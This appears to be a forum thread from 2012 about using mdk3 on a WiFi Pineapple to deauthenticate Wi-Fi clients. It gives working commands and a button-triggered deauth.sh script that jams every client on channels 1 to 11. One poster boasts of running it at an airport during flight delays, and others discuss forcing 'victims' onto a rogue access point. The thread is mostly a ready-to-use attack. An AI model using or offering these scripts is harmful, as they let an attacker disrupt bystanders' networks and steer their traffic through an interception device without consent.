Deauthing Using Mdk3

[PineDominator]

OK so I saw Darren asking about mdk3 as an alternative to the aircrack suite to deauth.

The great thing about using mdk3 instead of the jammer module/aircrack suite is I saw a huge drop in cpu/ram usage:-D

ssh into pineapple and issue

opkg update
[/CODE]

and to install mdk to usb, [note] you must use a powered usb hub in order to use more than one device.

[CODE]
opkg --dest usb install mdk3
ln -s /usb/usr/sbin/mdk3 /usr/sbin/mdk3
[/CODE]

or install it to internal memory freeing the one usb port for your wifi card

[CODE]
opkg install mdk3
[/CODE]

now you can create a monitor interface

[CODE]
airmon-ng start wlan1
[/CODE]

and to launch mdk3

[CODE]
mdk3 mon0 d -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

Setting channel hopping from 1 to 11 deauths on all channels:-D about 3 seconds per channel.

[NOTE] Currently firmware 2.6.0-1 does not show stations that are being deauthed, but is is working.

Full instructions to deauth using mdk3 with an external wifi adapter

[CODE]
airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > whitelist.txt #MAC address of wlan0, pineapple ssid

mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

add any other ap's mac addresses to whitelist.txt that you do not want deauthed, one mac per line.

or use the -b option instead "-b blacklist.txt" fill blacklist.txt with mac addresses that you only want deauthed.

Now if you want to tie it all to say WM button module I use this script to deauth for 36 seconds (takes 34 seconds to loop back to channel 1, 2+ seconds just in case), it also sets up the whitelist:-D

deauth.sh

[CODE]
#!/bin/sh

airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

sleep 36

killall -9 mdk3

airmon-ng stop mon0
[/CODE]

[note] /tmp/ directory is ram memory, erases every boot

This piece of code is very effective at deauthing, plus I love to trigger it via the button module.

I should also note that I have been having issues with my alfa nha and run these commands in the start-up script to fix the issue

this seems to only be an issue with firmware 2.6.0-1, It sets the physical interface (alfa NHA usually phy1) to wlan1.

[CODE]
iw phy1 interface add wlan1 type managed
iwconfig wlan1 power on
[/CODE]

also I found rebooting can sometimes make the NHA disappear so I have to unplug both power to the pineapple and usb hub to properly reset

Edited August 25, 2012 by petertfm

[Mr-Protocol]

Ah, didn't know he was looking to use it for the pineapple. I tested it in an airport with mdk3 on BT VM. Worked great :D. Nothing like having fun with an airport that was grounded for a storm earlier and flights were 2 hours delayed :D.

[PineDominator]

Ah, didn't know he was looking to use it for the pineapple. I tested it in an airport with mdk3 on BT VM. Worked great :D. Nothing like having fun with an airport that was grounded for a storm earlier and flights were 2 hours delayed :D.

cool

I switched to mdk3 from airdrop-ng on BackTrack because the latest version of airdrop-ng is almost imposible for me to install, I can't figure out all the dependencys.

Edited August 18, 2012 by petertfm

[LyNX333]

Thank you for sharing

Can u explane how use a file with a list of ap's mac's that are not to be deautuse on BT?

[Mr-Protocol]

Thank you for sharing

Can u explane how use a file with a list of ap's mac's that are not to be deautuse on BT?

mdk3 --fullhelp
[/CODE]

[rebelred]

Would the best use of mdk3 be on a VM using a wifi card to deauth a network, and then get the victims to connect to Pineapple invisibly.

My question is, what's stopping the victim's pc reconnecting to the original network once mdk3 finishes.

[PineDominator]

Would the best use of mdk3 be on a VM using a wifi card to deauth a network, and then get the victims to connect to Pineapple invisibly.

My question is, what's stopping the victim's pc reconnecting to the original network once mdk3 finishes.

using a computer to do all the deauthing is a good idea if you need most to the pineapples cpu for other things.

my experience with deauthing is the victim after being deauthed a few times looks for another network to join.

[Darren Kitchen]

Ya got me! I've been experimenting with MDK3 as part of a yet-to-be released module. During my research I found that mdk3 could be a decent alternative to aireplay-ng since it has built in white and blacklisting, channel hopping, etc.

The most exciting finding however, was regarding interfaces and karma...

I'm able to do frame injection while channel hopping on mon.wlan0 while running karma on wlan0 -- at the same time. I've tested and clients connected to the internet through the pineapple via karma aren't interrupted by the beacon injection I'm doing....even while it channel hops...and new clients are able to connect as well.

Perhaps this has to do with the way beacon frames work as opposed to deauth frames, but it led me to experiment with the later.

I'm able to run mdk3 mon.wlan0 d -w whitelist.txt (containing the pineapple's wlan0 mac) and it shows that it's deauthing clients nearby, however in my tests it was unable to successfully deauth the galaxy nexus and nexus 7 devices I had connected to a legit AP nearby.

My hope was that we could have a built in way to do whitelisted/blacklisted deauthing on a single radio -- no need for an AWUS036NHA connected -- but so far that isn't the case.

Is anyone elses findings showing otherwise? mdk3 can do some pretty rad things :)

edit: deauth mode findings: unless you specify -c # mdk3 will channel hop 1-14. In the US you may want to specify -c 1,2,3,4,5,6,7,8,9,10,11

[PineDominator]

Ya got me! I've been experimenting with MDK3 as part of a yet-to-be released module. During my research I found that mdk3 could be a decent alternative to aireplay-ng since it has built in white and blacklisting, channel hopping, etc.

The most exciting finding however, was regarding interfaces and karma...

I'm able to do frame injection while channel hopping on mon.wlan0 while running karma on wlan0 -- at the same time. I've tested and clients connected to the internet through the pineapple via karma aren't interrupted by the beacon injection I'm doing....even while it channel hops...and new clients are able to connect as well.

Perhaps this has to do with the way beacon frames work as opposed to deauth frames, but it led me to experiment with the later.

I'm able to run mdk3 mon.wlan0 d -w whitelist.txt (containing the pineapple's wlan0 mac) and it shows that it's deauthing clients nearby, however in my tests it was unable to successfully deauth the galaxy nexus and nexus 7 devices I had connected to a legit AP nearby.

My hope was that we could have a built in way to do whitelisted/blacklisted deauthing on a single radio -- no need for an AWUS036NHA connected -- but so far that isn't the case.

Is anyone elses findings showing otherwise? mdk3 can do some pretty rad things :)

edit: deauth mode findings: unless you specify -c # mdk3 will channel hop 1-14. In the US you may want to specify -c 1,2,3,4,5,6,7,8,9,10,11

Ok so what I have found is I can't use mon.wlan0 mdk3 just hangs, but I can run "airmon-ng start wlan0" then run "mdk3 mon0 d" all clients are deauthed on channel 11 so any wifi on channel 11 will be deauthed works great... but thats just 1/11.

using the -c 6 does not work even though mdk3 says it is, I have edited /etc/config/wireless to channel 6 and after a reboot "mdk3 mon0 d" deauths me from my home wifi.

so the problem is radio0 seems to be stuck on the channel specified in /etc/config/wireless, how can this be changed so true channel hopping is achievable?

[Darren Kitchen]

Seems we're having similar experiences. mdk3 reports that its channel hopping, but in my experience it isn't seeing the devices on other channels. Both nexus aren't getting seen. Wish I had saved my output.

I find it interesting the beacon mode channel hops but deauth won't. The best I can figure is that beacons are sent to broadcast FF:FF:FF:FF:FF:FF with the channel set as a parameter within the packet, and not actually sent on said channel. Wireshark supports this. If that's the case then perhaps channel hopping deauth while running Karma on radio0 isn't possible.

[PineDominator]

Seems we're having similar experiences. mdk3 reports that its channel hopping, but in my experience it isn't seeing the devices on other channels. Both nexus aren't getting seen. Wish I had saved my output.

I find it interesting the beacon mode channel hops but deauth won't. The best I can figure is that beacons are sent to broadcast FF:FF:FF:FF:FF:FF with the channel set as a parameter within the packet, and not actually sent on said channel. Wireshark supports this. If that's the case then perhaps channel hopping deauth while running Karma on radio0 isn't possible.

maybe beacon mode is not channel hopping as well, if a device is listening for ssid becons it would pick it up because it's doing the hopping and not the pineapple, I guess we would need to run airodump-ng on another computer to test this out, I wonder if DigiNinja would know why it's hapening this way? if he programmed karma to function this way "mon.wlan0"

[PineDominator]

I have updated the origanal post, I have found that mdk3 is much better for deauthing than using the aircrack suite

Instructions to deauth using mdk3 with an external wifi adapter

ifconfig wlan1 up
airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > whitelist.txt #MAC address of wlan0, pineapple ssid

mdk3 mon0 d -w whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11
[/CODE]

add any other ap's mac addresses to whitelist.txt that you do not want deauthed.

or use the -b option instead "-b blacklist.txt" fill blacklist.txt with mac addresses that you only want deauthed

Edited August 20, 2012 by petertfm

[WatskeBart]

Can't wait to get crackin' :P now waiting for my AWUS036NHA to arrive

[PineDominator]

so I created a script to run at startup or using the wps button, currently I am having problems using the button module not running mdk3???

deauth.sh

#!/bin/sh
ifconfig wlan1 up
airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

sleep 36

killall -9 mdk3

airmon-ng stop mon0
ifconfig wlan1 down
[/CODE]

make sure you chmod +x deauth.sh

I hope to have it working with the push of the wps button, also I create and distroy the mon0 interface each time, I did this for easier coding but it also saves power:-)

[fliphacker]

I have looked at the --fullhelp and did not see the whitelist.txt format, are the MAC's comma separated or on separate lines for the file structure?

[Whistle Master]

Hm interesting, I will have a look to modify the jammer module to use mdk3 :P

[PineDominator]

I created a script that can be run from the startup script/button module to deauth for 36 seconds, 36 seconds should do all channels (1 to 11)

Now if you want to tie it all to say WM button module I use this script to deauth for 36 seconds (takes 34 seconds to loop back to channel 1, 2+ seconds just in case), it also sets up the whitelist:-D

deauth.sh

#!/bin/sh

airmon-ng start wlan1

ifconfig wlan0 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 &

sleep 36

killall -9 mdk3

airmon-ng stop mon0
[/CODE]

[note] /tmp/ directory is ram memory, erases every boot

This piece of code is very effective at deauthing, plus I love to trigger it via the button module.

I should also note that I have been having issues with my alfa nha and run these commands in the start-up script to fix the issue

this seems to only be an issue with firmware 2.6.0-1, It sets the physical interface (alfa NHA usually phy1) to wlan1.

[CODE]
iw phy1 interface add wlan1 type managed
iwconfig wlan1 power on
[/CODE]

also I found rebooting can sometimes make the NHA disappear so I have to unplug both power to the pineapple and usb hub to properly reset

Edited August 25, 2012 by petertfm

[Dosk3n]

Not working here. Up to date firware and using Alpha 36NHA.

I bring the interface (Alpha) up on wlan1. This works as the blue light comes on. run airmon and get mon0 on wlan1. Create whitelist which I cat to confirm it shows mac address which it does.

If I run

mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11

It hangs and nothing happens.

If I run

mdk3 mon0 d

The alph turns itself off and I get

Disconnecting between (MAC) and (MAC)

packets sent: 1 - Speed: 1 packets/secread failed: Network is down

wi_read(): Network is down

[PineDominator]

Not working here. Up to date firware and using Alpha 36NHA.

I bring the interface (Alpha) up on wlan1. This works as the blue light comes on. run airmon and get mon0 on wlan1. Create whitelist which I cat to confirm it shows mac address which it does.

If I run

It hangs and nothing happens.

If I run

The alph turns itself off and I get

with the newest firmware you have to bring wlan1 down before running the script, are you using a powered hub?

[Neworld]

Anyone making a module for this??

or maybe just replace the jammer we have now with this instead.

[PineDominator]

Anyone making a module for this??

or maybe just replace the jammer we have now with this instead.

I want to test the jamer module on my friends phone first, mdk3 worked on mine but didn't on his, need to make sure it's not related to just mdk3

[Dosk3n]

with the newest firmware you have to bring wlan1 down before running the script, are you using a powered hub?

Tried but still no joy. ifconfig wlan1 up - airmon-ng start wlan1 - ifconfig wlan1 down - Same thing.

Im not using a powered hub. Waiting on the hak5 cable to arrive but its international posting so have to wait. Im running on 12v though so wouldnt have thought there be an issue.

[Dosk3n]

Also tried jammer and same thing. Although I can run things such as aimodump fine.

[Whistle Master]

For the moment I don't want to replace my actual module with mdk3 as some people noticed that some APs are not sensible to mdk3 ;)

But I may build an additional module dedicated to mdk3.

[mondrianaire]

mdk3 seems to work fine on mine, although I havent looked into the channel hopping issue.

My problem is with practicality. Using MDK3 for deauthing with the pineapple only will work well if tethered to an android, using a wired connection, or 3g dongle. Most of my setups involve 2 external adapters to my pineapple. You have the pineapples wifi radio for lan, one used in client mode for internet access and a third for deauth attacks. The main problem with using MDK3 is that it only can whitelist/blacklist AP's, not stations.

Give this scenario. There is an AP, with multiple clients connected. I come in with my pineapple, use one of the external radios to connect to the AP, then use the other radio to deauth. What do I deauth? If I deauth the AP, then my pineapple will lose internet access. If I dont, they have no reason to break current association, and will never connect to the pineapple.

That is where airdrop is *supposed* to come in. Airdrop takes live output for the clients that are connected and can handle both AP & client rules together. Therefore you can set up a scenario where noone else can connect to any ap, except your pineapple. But your WAN adapter on your pineapple can still connect to some rogue AP. But as petertfm has said before, figuring out the dependencies for airdrop is next to impossible.

Given this scenario, using mdk3 is relatively useless. I dont care about anyone connecting to other access points, I just want everyone but my pineapple to be kicked from the access point, which is not possible without client-based rules.

Am I missing something? How is everyone else using mdk3? Is it useful or just trying to get it working?